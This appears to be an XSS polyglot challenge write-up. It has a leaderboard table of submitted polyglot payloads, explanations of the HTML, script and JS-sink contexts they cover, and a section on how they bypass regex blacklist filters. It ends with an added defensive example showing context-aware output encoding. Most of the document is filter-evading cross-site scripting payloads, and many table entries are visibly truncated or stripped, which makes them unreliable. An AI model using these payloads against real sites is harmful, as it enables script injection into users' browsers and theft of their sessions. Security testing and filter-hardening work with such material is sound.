| # | Name | Contexts | Length | Payload |
|---|------|----------|--------|---------|
| 0 | crlf | 20 | 141 | javascript:"/*'/*`/*--> |
| 1 | europa | 20 | 143 | javascript:"/*'/*`/*\" /*<svg/onload=/* |
| 2 | EdOverflow | 20 | 143 | javascript:"/*\"/*`/*' /*--><svg onload=/* |
| 3 | h1/ragnar | 20 | 143 | javascript:`//"//\"//<svg/onload='/*-->` |
| 4 | A. Korzhynskyi | 20 | 143 | javascript:`//"//\"//<svg/onload='/*-->` |
| 5 | Somdev Sangwan | 20 | 144 | javascript:`/*\"/*--><svg onload='/*` |
| 6 | @trichimtrich | 20 | 144 | javascript:"/*'//`//\"// |
| 7 | tsug0d | 20 | 145 | javascript:"/*`/*\"/*'/* |
| 8 | Benoit Esnard | 20 | 146 | javascript:`\"///"//< |
| 9 | @rawsec | 20 | 146 | javascript:`\"///"//< |
| 10 | @RakeshMane10 | 20 | 149 | javascript:/*`//'//\"//--> |
| 11 | @TeamBounters | 20 | 149 | javascript:/*`//'//\"//--> |
| 12 | bounter | 20 | 150 | javascript:/*"//'//`//\"//--> |
| 13 | bayo | 20 | 150 | javascript:/*-->'//"//`//\"// |
| 14 | n1 | 20 | 150 | javascript:/*"/*'/*`/*\"/*--> |
| 15 | @y0n3uchy | 20 | 150 | javascript:/*"/*'/*\"/*`/*--> |
| 16 | Meerkat | 20 | 152 | javascript:/*"/*`/*'/*\"/*--> |
| 17 | qd (@qd0an) | 20 | 154 | javascript:"/*'//`//\"//--></ |
| 18 | i | 20 | 155 | javascript:alert()"//\"//'//`//--> |
| 19 | yusuke | 20 | 155 | javascript:alert()"//\"//'//`//--> |
| 20 | @m4th3c | 20 | 156 | javascript:/*"/*`/*'/*\"/*< |
| 21 | concavang | 20 | 156 | javascript:"/*`/*\"/*' /*<img src=x:x onerror=alert(1)> alert(1)// |
| 53 | k9 | 19 | 143 | javascript:"/*'//`//\"// |
| 54 | xrekkusu | 19 | 165 | javascript:/*\"+/*<script>//--> |
| 55 | h45h5h0t | 19 | 179 | javascript:alert();//<svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();// |
| 56 | @h45h5h0t | 19 | 179 | javascript:alert();//<svg/onload= alert()>/*"/*'/*`/*\"/**/ alert()();// |
| 57 | titi | 19 | 211 | javascript:alert()//'/*`/*"/**/;alert()//%0D%0A-->'>"><svg/oNloAd=alert()>*/alert();//"alert();// |
| 74 | sysr00t | 15 | 131 | javASCripT:/*\\"/*\"/*'/*`/**/(/**/onClICk=alert``)//< |
| 75 | awsm | 15 | 156 | /*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())// |
| 76 | t | 15 | 156 | /*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())// |
| 77 | seth | 15 | 189 | javascript:alert(1);//";alert(1);//';alert(1);//`;alert(1);//">'>-->%26lt; alert(1);// |
| 78 | aaaaaab | 15 | 192 | javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//--> |
| 79 | abdilahrf | 15 | 224 | javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//'"/*–>]]>%>?>!-->>’ |
| 80 | aaaaaa | 14 | 170 | javascript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//--> |
| 81 | testing B | 14 | 281 | javascript:alert()//<img src=1 onerror=alert()>"onmouseover=alert() 'onmouseover=alert() -->'-alert()-';"-alert()-";${alert()} |
| 82 | x3b | 13 | 141 | */alert()/*'-->"--> |
| 85 | byq | 12 | 123 | ";alert()//-->"'> |
| 86 | o_O | 12 | 143 | jaVasCript:/*-/*`/*`/*'/*'"/**/(/**/oNCliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 87 | Cider sweet | 12 | 155 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 88 | lala | 12 | 358 | jaVaSCriPt:/*\\x3csvG/oNloAd=alert()\\x3e*/alert()//;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoKT4K}}-->';alert();'";alert();"--> |
| 89 | loop | 11 | 116 | */";alert();//';alert();//‘;alert();>-->'> |
| 91 | ww | 11 | 125 | '>">'--> |
| 92 | Madsi lingling | 11 | 128 | '"> --> |
| 93 | L | 11 | 128 | -->"//'//> |
| 94 | dorans_blade | 11 | 132 | "'>-->\x3csVg/\x3e |
| 96 | moe | 11 | 135 | "'--> |
| 97 | 0 | 11 | 138 | "'>--> |
| 98 | jesusohjesus | 11 | 138 | ">-->'>-->-->-->-->-->-->-->-->--> |
| 99 | Checkium | 11 | 143 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert())//%0D%0A%0d%0a//\x3csVg/\x3e |
| 100 | 123 | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 101 | borski | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 102 | mvs | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 103 | aa | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 104 | aaron | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 105 | pl0kta | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 106 | dehong | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 107 | asas | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 108 | denis | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 109 | Jozo | 11 | 144 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//\x3csVg/\x3e |
| 110 | gjbae | 11 | 148 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert('') )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 111 | polyglot | 11 | 152 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3epolyglot |
| 112 | ja1 | 11 | 157 | */" onload=;alert();//';alert();//‘;alert();>-->\x3csVg/\x3e |
| 114 | K | 10 | 88 | "'--> |
| 115 | Zajebisty ctf | 10 | 102 | "'--> |
| 116 | nobody2 | 10 | 114 | |
| 117 | 5unKn0wn | 10 | 117 | |
| 118 | p0uts@ | 10 | 143 | javascript:/*--> |
| 119 | kumagoro | 9 | 95 | '"--> |
| 120 | foo | 9 | 97 | "'>-->*/ |
| 121 | dumb | 9 | 112 | javascript:/*--> |
| 122 | Dpster | 9 | 113 | javascript:/*--> |
| 123 | 001test | 9 | 547 | ">javascript:/*-->">[img=1]">#">""--!> |
| 124 | x | 8 | 77 | "'--> |
| 125 | ssssss | 8 | 132 | javascript:"/*'/*`/*--> |
| 126 | hello | 8 | 138 | '--> javascript:/*--> |
| 127 | | 8 | 157 | javascript:/*"/*`/*'/*\"/*xxxxxxxxxxxxxxxx |
| 128 | a | 7 | 62 | ">'>--> |
| 129 | nyaan | 7 | 99 | */alert();';alert();//">'> |
| 130 | karlito | 7 | 145 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 131 | lol | 7 | 145 | jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e |
| 132 | testgbgb | 6 | 52 | "'>-->*/ |
| 133 | xss | 6 | 114 | javascript:/*--> |
| 134 | kurumi | 6 | 118 | "> '--> |
| 137 | yeeeee | 5 | 339 | > ='> "> %3Cscript%3Ealert('XSS')%3C/script%3E |
| 138 | @marataziat | 4 | 39 | `"*/>'--> |
| 139 | BlackGoat | 4 | 47 | */`"'--> }''{ |
| 141 | tts | 3 | 30 | "'--> |
| 143 | marataziat | 3 | 38 | '`"*/ /> |
| 144 | ali | 3 | 60 | |
| 145 | sdf | 2 | 24 | '--> |
| 146 | SamiaM | 2 | 24 | '--> |
| 147 | loveOverflow | 2 | 24 | '"> |
| 148 | thien | 2 | 24 | '--> |
| 149 | jji | 2 | 24 | '--> |
| 150 | 21 | 2 | 24 | '--> |
| 151 | Mit | 2 | 24 | '--> |
| 152 | @SecurityMB | 2 | 25 | javascript://\" alert()// |
| 153 | 1 | 2 | 26 | > |
| 154 | zorx | 2 | 27 | '-->--> |
| 155 | newbuy | 2 | 27 | '--> |
| 156 | sumfree | 2 | 28 | --> |
| 157 | Xm17 | 2 | 36 | |
| 158 | Damian89 | 2 | 36 | |
| 159 | Tagir Z. | 2 | 37 | '--> |
| 160 | zajebisty ctf | 2 | 47 | |
| 161 | | | | '"/>>> |
| 162 | 001test555 | 2 | 143 | ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromChar |

HTML contexts covered:

- Double-quoted tag attributes: \x3csVg/\x3e "> (Demo: jsbin.com/dopepi)
- Single-quoted tag attributes: Demo: jsbin.com/diwedo
- Unquoted tag attributes: Demo: jsbin.com/zizuvad
- Unquoted tag attributes with HTML-escaped values (may require a click): jaVasCript:/*-/*`/*\`/*'/*"/**/(/* (Demo: jsbin.com/gopavuz; note that the click might not be needed with elements that support the onload event handler.)
- href/xlink:href and src attributes with HTML-escaped values: "click me" links, Demo: jsbin.com/kixepi, Demo: jsbin.com/bezofuw, Demo: jsbin.com/feziyi
- HTML comments: \x3csVg/\x3e --> (Demo: jsbin.com/taqizu)
- Arbitrary common HTML tags: jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e (Demo: jsbin.com/juzuvu); \x3csVg/\x3e (Demo: jsbin.com/qonawa); Demo: jsbin.com/mecexo
- jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e (Demo: jsbin.com/wuvumuh)

Script contexts covered:

- Double-quoted strings (Demo: jsbin.com/coteco):

```javascript
var str = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e";
```

- Single-quoted strings (Demo: jsbin.com/bupera):

```javascript
var str = 'jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e';
```

- Template strings/literals (ES6) (Demo: jsbin.com/rewapay):

```javascript
String.raw`jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e`;
```

- Regular expression literals (Demo: jsbin.com/zepiti):

```javascript
var re = /jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e/;
```

- Single-line and multi-line comments: Demo: jsbin.com/fatorag, Demo: jsbin.com/vovogo

JS sinks:

- eval: `eval(location.hash.slice(1));` Demo: https://jsbin.com/qejisu#jaVasCript:/*-/*%60/%5C%60/*'/%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e
- setTimeout: `setTimeout(location.search.slice(1));` Demo: https://jsbin.com/qawusa?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e
- setInterval: `setInterval(location.search.slice(1));` Demo: https://jsbin.com/colese?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e
- Function: `new Function(location.search.slice(1))();` Demo: https://jsbin.com/hizemi?jaVasCript:/*-/*%60/*%5C%60/*'/*%22/**/(/*%20*/oNcliCk=alert()%20)//%0D%0A%0d%0a//%3C/stYle/%3C/titLe/%3C/teXtarEa/%3C/scRipt/--!%3E%5Cx3csVg/%3CsVg/oNloAd=alert()//%3E%5Cx3e
- innerHTML/outerHTML and document.write with HTML-escaped strings:

```javascript
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
document.documentElement.innerHTML = data;
```

  Demo: jsbin.com/nimokaz

```javascript
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
document.head.outerHTML = data;
```

  Demo: jsbin.com/yowivo

```javascript
var data = "jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e";
document.write(data);
document.close();
```

  Demo: jsbin.com/ruhofi

- Event handlers with HTML-escaped values: Demo: jsbin.com/puboha

Filter evasion:

As you might have already noticed, the polyglot has been crafted with filter evasion in mind. For instance:

- jaVasCript:, oNcliCk=, et al. bypasses: `preg_replace('/\b(?:javascript:|on\w+=)/', '', PAYLOAD);`
- /*`/*\` bypasses: `preg_replace('/`/', '\`', PAYLOAD);`
- bypasses: `preg_replace('/<\/\w+>/', '', PAYLOAD);`
- --!> bypasses: `preg_replace('/-->/', '', PAYLOAD);`
- bypasses: `preg_replace('/<\w+\s+/', '', PAYLOAD);`

Bonus attacking contexts covered:

- CRLF-based XSS:

```http
HTTP/1.1 200 OK
Date: Sun, 01 Mar 2016 00:00:00 GMT
Content-Type: text/html; charset=utf-8
Set-Cookie: x=jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//
//\x3csVg/\x3e
```

- Error-based SQL injections (yes, SQLi!):

```sql
SELECT * FROM Users WHERE Username='jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e'
SELECT * FROM Users WHERE Username="jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//\x3csVg/\x3e"
```
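Added example, not code from the challenge page or its author: the five preg_replace() rules listed under "Filter evasion", translated to JavaScript and run over the page's own polyglot, beside the context-aware output handling (attribute encoding, JS string encoding, URL scheme allowlist) that does not depend on guessing the attacker's spelling. The function names and the base URL app.example are constructed for this example.

```javascript
// Added example (not part of the challenge page): why the regex blacklists
// under "Filter evasion" fail against the polyglot, and what context-aware
// output handling looks like instead. Runs in Node.js.

// The polyglot as printed on the page, escaped so it is a valid JS literal.
const POLYGLOT =
  "jaVasCript:/*-/*`/*\\`/*'/*\"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//" +
  "</stYle/</titLe/</teXtarEa/</scRipt/--!>\\x3csVg/<sVg/oNloAd=alert()//>\\x3e";

// JavaScript equivalents of the page's five preg_replace() rules (a blacklist).
function blacklistFilter(s) {
  return s
    .replace(/\b(?:javascript:|on\w+=)/g, "") // case-sensitive: misses jaVasCript:, oNcliCk=
    .replace(/`/g, "\\`")                      // backslash-escapes backticks; /*\` already expects that
    .replace(/<\/\w+>/g, "")                   // expects </tag>, the polyglot writes </tag/
    .replace(/-->/g, "")                       // expects -->, the polyglot writes --!>
    .replace(/<\w+\s+/g, "");                  // expects "<tag ", the polyglot writes <sVg/
}

// Characters that can close an attribute value or open a new tag.
function hasAttributeBreakout(s) {
  return /["'<>`]/.test(s);
}

// Output encoding for an HTML attribute context: every character that could
// end the value or start markup becomes a numeric entity, whatever the input.
function encodeForHtmlAttribute(s) {
  return s.replace(/[&<>"'`]/g, (c) => `&#${c.charCodeAt(0)};`);
}

// Output encoding for a JS string context: JSON.stringify handles quotes and
// backslashes; escaping < and > keeps a </script> from ending the script block.
function encodeForJsString(s) {
  return JSON.stringify(s).replace(/</g, "\\u003c").replace(/>/g, "\\u003e");
}

// URL attributes (href, src, xlink:href) need an allowlist on the parsed
// scheme rather than a search for "javascript:"; the URL parser lowercases it.
function isSafeHref(value) {
  try {
    const u = new URL(value, "https://app.example/"); // constructed base URL
    return u.protocol === "http:" || u.protocol === "https:";
  } catch (e) {
    return false;
  }
}

console.log(hasAttributeBreakout(blacklistFilter(POLYGLOT)));        // true
console.log(hasAttributeBreakout(encodeForHtmlAttribute(POLYGLOT))); // false
console.log(isSafeHref(POLYGLOT));                                   // false
```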